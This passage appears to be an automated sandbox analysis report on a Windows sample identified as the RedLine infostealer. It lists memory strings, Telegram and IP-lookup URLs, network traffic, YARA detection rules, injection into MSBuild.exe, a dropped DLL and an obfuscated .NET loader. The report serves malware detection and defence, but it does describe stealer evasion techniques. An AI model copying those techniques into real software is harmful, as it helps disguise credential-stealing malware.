                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1Response
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue1ResponseD
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2Response
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue2ResponseD
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3Response
                Source: MSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Contract/MSValue3ResponseD
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                Source: MSBuild.exe, 00000002.00000002.1689531411.00000000092C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1689531411.00000000090D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                Source: CCdaw0qbbo.exe, CCdaw0qbbo.exe, 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.CCdaw0qbbo.exe.6e350000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                .NET source code contains very large array initializations
                Source: CCdaw0qbbo.exe, -Module-.csLarge array initialization: _200E_206F_206E_202B_206F_206F_200E_206D_200F_202B_202B_200B_200C_206B_206A_200D_202A_200E_206A_206B_200C_200D_206D_206E_206B_202B_200E_202D_202D_206C_200B_202A_206F_206E_200E_202A_206A_200C_202B_202C_202E: array initializer size 36960
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E357640 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetProcAddress,0_2_6E357640
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E357E100_2_6E357E10
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E3576400_2_6E357640
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E3511E00_2_6E3511E0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E357AB00_2_6E357AB0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E371BC50_2_6E371BC5
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E3660400_2_6E366040
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E0A390_2_025E0A39
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E62200_2_025E6220
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E0A910_2_025E0A91
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E0B310_2_025E0B31
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E2BB00_2_025E2BB0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E2BA00_2_025E2BA0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E08DA0_2_025E08DA
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E09340_2_025E0934
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E09E00_2_025E09E0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E098A0_2_025E098A
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E16400_2_025E1640
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E16300_2_025E1630
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E34180_2_025E3418
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E0CCF0_2_025E0CCF
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E35F80_2_025E35F8
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_025E0D980_2_025E0D98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_010144182_2_01014418
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01010A102_2_01010A10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01014CE82_2_01014CE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_010140D02_2_010140D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_010109FF2_2_010109FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066F30A02_2_066F30A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066F30902_2_066F3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067367F42_2_067367F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0673C5802_2_0673C580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067322A02_2_067322A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067390682_2_06739068
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067367F42_2_067367F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067367F42_2_067367F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0676822B2_2_0676822B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0676CD782_2_0676CD78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067600402_2_06760040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067600072_2_06760007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067629A02_2_067629A0
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: String function: 6E367150 appears 33 times
                Source: CCdaw0qbbo.exeBinary or memory string: OriginalFilename vs CCdaw0qbbo.exe
                Source: CCdaw0qbbo.exe, 00000000.00000000.1617102376.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBob164Charlie.txtP vs CCdaw0qbbo.exe
                Source: CCdaw0qbbo.exe, 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameRadiogram.exe" vs CCdaw0qbbo.exe
                Source: CCdaw0qbbo.exe, 00000000.00000002.1622118957.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CCdaw0qbbo.exe
                Source: CCdaw0qbbo.exeBinary or memory string: OriginalFilenameBob164Charlie.txtP vs CCdaw0qbbo.exe
                Source: CCdaw0qbbo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.CCdaw0qbbo.exe.6e350000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpack, Arguments.csBase64 encoded string: 'NSA7VwQhI1EYEVBXKwRfCxgRHSw/WAEfAT0NLj0CBhU2EispNVgeFx8FAVcDISwdGwFREQRaPAsNP1gNBVtfEzA/XBcDIQUSDVpQEytbAgwYWj8UPlsoDDU/ERQ+PiNa'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@2/2
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
                Source: CCdaw0qbbo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: CCdaw0qbbo.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: CCdaw0qbbo.exeReversingLabs: Detection: 83%
                Source: unknownProcess created: C:\Users\user\Desktop\CCdaw0qbbo.exe "C:\Users\user\Desktop\CCdaw0qbbo.exe"
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: CCdaw0qbbo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: CCdaw0qbbo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: CCdaw0qbbo.exe, -Module-.cs.Net Code: _206B_202D_200E_200E_206E_202A_202D_206B_200B_206B_202D_206E_202D_206B_206A_200C_200E_202E_200E_200E_202C_202E_200F_206B_206B_200F_206F_206F_206F_202B_200B_206F_200B_206C_206F_202E_200B_206D_200C_200F_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E3722F4 push ecx; ret 0_2_6E372307
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E380E9F push es; ret 0_2_6E380EA6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0101941F pushfd ; ret 2_2_01019429
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_01016CF0 push eax; retf 2_2_01016CF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066FE3F1 push es; ret 2_2_066FE400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066FCBC1 push 000000C3h; ret 2_2_066FCBD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_066F29C0 push es; ret 2_2_066F29D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0676822B push es; iretd 2_2_0676866C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0676822B push es; ret 2_2_067687DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_06763C10 push eax; ret 2_2_06763C23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_06768267 push es; iretd 2_2_0676826C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_067683DB push es; ret 2_2_067683DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_0676DC43 push esp; iretd 2_2_0676DC49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_06760A9B push es; ret 2_2_06760AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_06762940 push es; ret 2_2_06762950
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
